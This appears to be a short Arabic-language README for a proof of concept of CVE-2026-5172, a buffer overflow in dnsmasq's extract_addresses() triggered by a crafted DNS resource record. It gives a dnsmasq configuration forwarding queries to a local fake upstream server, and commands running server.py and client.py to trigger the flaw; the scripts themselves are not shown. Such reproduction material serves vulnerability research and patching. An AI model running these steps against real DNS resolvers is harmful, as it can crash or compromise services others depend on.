
CVE-2026-5172: تجاوز سعة المخزن المؤقت في extract_addresses() على سجل موارد مُصمَّم خصيصًا PoC
CVE-2026-5172: تجاوز سعة المخزن المؤقت في extract_addresses() عند معالجة سجل موارد مُصنَّع (PoC)
اقرأ الطوبولوجيا هنا https://medium.com/@yanyuyingshu/reproduction-journal-dnsmasq-ecs-validation-and-buffer-overflow-flaws-e0fe0f66f60c
الخطوات
port=5353
listen-address=xxx.xxx.xxx.x
bind-interfaces
no-resolv
no-hosts
no-poll
cache-size=1000
log-queries
log-facility=-
server=127.0.0.1#5354
(ثم أعد تشغيل خدمة dnsmasq)
python3 server.py --host 127.0.0.1 --port 5354 --rdlen 6 –debug &
python3 client.py --dnsmasq-host xxx.xxx.xxx.x --dnsmasq-port 5353 --timeout 5.0 --count 3